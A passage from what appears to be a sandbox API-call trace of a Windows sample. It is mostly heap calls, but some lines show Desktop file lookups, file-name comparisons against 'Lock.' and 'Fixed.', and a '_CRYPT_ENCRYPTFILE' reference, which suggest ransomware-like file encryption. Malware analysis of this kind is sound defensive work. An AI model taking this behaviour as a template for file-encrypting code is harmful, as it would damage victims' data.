Flags=0x0, Size=0x70) returned 0x2e58910 [0132.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0132.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0132.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0132.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0132.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0132.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e563a8 [0132.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/3cV5UrNf8.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3", lpFilePart=0x8cf650*="3cV5UrNf8.mp3") returned 0x25 [0132.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0132.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3cV5UrNf8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\3cv5urnf8.mp3")) returned 0xffffffff [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0132.859] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0132.859] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.859] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0132.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0132.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5_pKd716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_pKd716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKd716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0132.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kd716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="716n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PnD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nD.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0132.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0132.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0132.860] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0132.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0132.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0132.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0132.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0132.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0132.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5_pKd716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_pKd716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKd716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kd716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="716n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PnD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0132.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nD.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0132.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0132.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0132.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0132.863] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0132.863] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0132.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0132.864] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0132.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0132.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0132.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0132.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0132.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0132.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0132.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0132.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0132.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0132.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0132.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0132.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0132.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0132.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0132.868] 